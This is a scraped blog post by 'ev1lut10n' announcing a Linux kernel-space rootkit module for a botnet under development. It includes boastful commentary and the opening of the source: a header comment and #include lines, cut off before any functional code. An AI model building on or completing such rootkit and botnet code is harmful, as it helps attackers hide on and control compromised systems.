Space Iklan Space Iklan Space Iklan Space Iklan

current developed botnet module for kernel space rootkit

Bookmark and Share
current developed botnet module for kernel space rootkit
well i'm very2 lazy to make something common like this. but this is what should be done . you can't blame someone by his character because it's what he bring since he was born moreover i've ability to find an 0day,you can not blame with your current level, someone blaming ev1lut10n is like saying :"ev1lut10n is a kid but i'm a lamer that, isn't it clear ???"

=================
/***
ev1lut10n kernel space rootkit
this rootkit just a module of current botnet development
**/
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/moduleparam.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/types.h>
#include <linux/version.h>
#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,33))
#include <generated/autoconf.h>
#else
#include <linux/autoconf.h>
 
beritasehari